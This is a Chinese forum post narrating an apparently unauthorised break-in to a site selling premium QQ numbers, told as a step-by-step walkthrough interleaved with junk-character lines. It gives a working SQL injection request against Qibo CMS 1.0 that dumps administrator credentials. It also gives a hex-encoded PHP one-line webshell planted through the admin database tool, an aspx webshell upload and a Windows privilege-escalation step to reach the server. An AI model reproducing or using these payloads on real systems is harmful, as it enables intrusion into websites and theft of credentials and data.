|
3 d- Q X7 T" l' d
, K' J8 b% R7 Z- y& [) | # t6 j2 z9 H' S3 D4 o* u: V
1 {0 {8 v+ _: O9 f5 {8 z, W
一、踩点寻找漏洞
1 ~- ], |: J$ c3 Z& H9 k6 Q
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
+ G/ R/ D) b0 a1 P随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
; G; {! t2 K6 e8 ?! l: w# ~
先注册一个用户,记住注册时候的邮箱以uid号,
9 m+ O* O7 E, V
6 x- e: M4 m6 F& _+ Z% K3 v
9 I5 j% p% K; O5 ~9 C然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
, w5 B8 A8 L* h/ j8 S u
I% h! e8 x4 f) Atruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
8 T8 u7 ?! H7 b# Q# O; O
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
0 H5 R# t& v& ?* f# N
- H+ h# _$ P2 K0 b/ {确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
* s$ R! }3 w! M3 J0 N+ W+ l
5 ~7 \ T p6 h
/ r2 i b2 K0 ~2 | y5 N3 }6 O; M解密进后台如图:
: g0 p O/ K% ]; c, T2 s3 z1 ]: z
. [, n8 T% g/ b& a
% S% Q4 [; C1 j3 y. z: R/ m# j( v; n5 u
2 X# o/ { G2 v二、后台getwebshell
7 h2 X2 t5 x, h) X进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
2 @& Y' O6 c0 D! w2 T
$ x; o @) I2 y5 s$ q
- K' W- I5 T) I, |- r2 Q) S
# O6 v" M, y8 B6 L7 t然后点确定,添加提示
* V* p& b$ |4 Z# V/ ^8 L& t4 K- v
& q' L2 _2 m5 H! k3 [
9 }+ L5 A% {$ W2 ?: a/ N2 ?
( F- U+ M0 Q& o9 X5 H& }
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
& B" y' }: Z* R, n. T6 s2 [
0 r+ |5 [ Z3 {$ |: t" v
/ [) [& l( ?8 w+ z改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
( y. ` M1 \+ J' l" L
如图:
' }% r6 w- g" T" ^& P2 h
5 Q# r3 ~/ B( _+ R
5 z4 g( C _8 z$ g! i/ J6 S
' v; X0 g7 f5 p8 l. d+ i* ]之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
J( C% V& R& x4 R; H& |2 P( a
* a7 i+ c) O4 T6 U6 d
2 t2 U8 e5 L6 m1 S
% @0 T( l; z: O, V* K- l# \1 w三、提权进服务器
1 y4 x. n% |$ \; V% r/ P
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
/ | l7 B3 b6 D- y5 E; P
+ ^ }. f" v5 N; h9 |/ E
/ ?1 A0 \8 o" |) o( }啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
8 g% d1 d7 v/ K+ A
) q. J6 \8 A5 i
2 d; _+ ^2 d, k+ b; }
然后登陆服务器如图:
% ]2 K& P. c2 D0 ^* b- H. p, ~- b
* I; h4 \ X' q. ] : O7 Z9 k6 s6 R& c, q$ O( ]; g
0 Q; y6 X( l- A7 ]; b
/ q4 t) q2 ~$ s+ Z4 x( T2 v+ M
: a+ C+ x1 x' T+ U难怪普通刀连接不上,原来是有狗。
9 z+ ]' W; ? U. |- f
M( y8 a$ g3 Z- m) K! v
) M- G8 z0 R2 G8 y0 o9 [! Y6 V 6 ]6 n. o$ c" y; t" s: b1 {; f
2 r( G4 X4 ?6 j4 D9 u1 b
4 A# L: t: n. w7 a
8 J; u- m, u" y/ i- F
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对